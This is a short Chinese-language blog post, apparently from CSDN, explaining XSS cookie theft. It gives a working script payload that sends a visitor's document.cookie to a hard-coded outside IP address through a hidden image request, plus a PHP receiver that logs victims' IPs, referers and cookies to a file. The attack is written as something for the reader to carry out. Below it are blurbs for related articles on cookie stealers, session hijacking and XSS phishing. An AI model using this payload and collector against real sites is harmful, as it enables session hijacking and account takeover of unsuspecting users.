xss的cookie窃取原理

最新推荐文章于 2024-06-01 08:38:34 发布
最新推荐文章于 2024-06-01 08:38:34 发布
阅读量1.3k 收藏 7
点赞数 1
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/119532514
版权

原理:我们可以在有xss漏洞的网站插入跳入我们网站的xss代码,使用户触发漏洞的时候将cookie传入进来,我们进行接收
具体实现:
    攻击代码:<script>document.write('<img src="http://1.117.107.31/getcookie.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>

    远程接收代码: 
<?php
$cookie = $_GET['cookie'];
$ip = getenv('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookie.txt','a');
fwrite($fp,"IP:".$ip." | Date And Time:".$time." | Referer:".$referer." | Cookie:".$cookie." ||| ");
fclose($fp);
?>
    最后实现通过xss漏洞盗取用户cookie的功能
 

鸣蜩十四
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS 盗取 Cookie 实验
m0_63645854的博客
04-01 384
本文主要介绍了XSS盗取Cookie流程
StoleYourCookies:XSS Cookie窃取器有效负载生成器
05-10
这是一个相当简单的XSS有效负载生成器,用于从经过身份验证的用户那里窃取会话Cookie。 用法 python2 StoleYourCookie.py <Local> <Port> 去做: 实施有效负载以绕过内容安全策略(CSP) 实施有效负载以绕过Web...
XSS攻击之窃取Cookie
weixin_34032792的博客
08-15 112
2019独角兽企业重金招聘Python工程师标准>>> ...
实战分析:如何窃取用户Cookie并保存到远程服务器
最新发布
weixin_43822401的博客
06-01 538
实战分析:如何窃取用户Cookie并保存到远程服务器。
【安全】P 4-2 XSS盗取cookie
Z_David_Z的博客
02-17 385
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除 服务器可
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7167
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
XSS实现cookie盗取
一期一会的博客
04-08 1027
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss上获取到cookie,利用中国菜刀通过获取的cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
JS写XSS cookie stealer来窃取密码的步骤详解
10-18
JavaScript是web中最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。这篇文章主要介绍了JS写XSS cookie stealer来窃取密码的步骤详解,需要的朋友可以参考下
xss Cookie
10-09
本文将深入探讨XSS漏洞的原理,以及如何利用Cookie进行攻击。 一、XSS漏洞概述 XSS漏洞产生的根本原因是Web应用程序没有正确地对用户输入进行过滤和转义。当用户提交的数据被直接插入到HTML页面中,未经处理的恶意...
XSS练习平台
07-17
XSS练习平台是一个用于学习和提升XSS防护技能的在线环境,提供了各种模拟的XSS漏洞场景,帮助用户理解其工作原理并掌握防范方法。 首先,我们要理解XSS漏洞的分类。XSS分为三种类型:反射型XSS、存储型XSS和DOM型...
cookie-stealer:简单PHP-Javascript-XSS的Web服务器Cookie窃取脚本
05-09
【标题】:“cookie-stealer:简单PHP-Javascript-XSS的Web服务器Cookie窃取脚本”描述了一种利用跨站脚本(XSS)漏洞来窃取用户Web服务器Cookie的恶意技术。Cookie是网站用于存储用户状态和信息的一种机制,如登录...
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 1016
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 1421
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 1851
xss盗取cookie
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2588
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
网络安全实验6 认识XSS & 盗取cookie
一半西瓜的博客
01-30 3947
赞赏码 & 联系方式 & 个人闲话 【实验名称】认识XSS&盗取cookie 【实验目的】 1.了解XSS漏洞 2. 掌握盗取Cookie的方法 【实验原理】 1.什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML...
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1305
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
2.6 xss(post)获取cookie信息
千寻的博客
11-22 480
文章目录原理环境搭建post.html源代码摘抄 原理 环境搭建 Window server2 2016 恶意构造post请求的链接 Window server 2016 搭建pikachu Window server 2008 攻击者搭建的xss后台,获取cookie信息 Window 10 正常用户访问 案例演示 第一步 点击链接,进入xss的post界面 http://192.168.232.158:8080/post.html 第二步 输入账号和密码
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4124
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
存储型xss dvwa窃取cookie
06-06
在DVWA中,攻击者可以通过在留言板或评论区等存储用户输入的地方,插入恶意脚本,从而窃取其他用户的cookie信息。这种攻击方式对网站的安全性造成了很大的威胁,需要网站管理员及时修复漏洞,加强网站的安全性防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值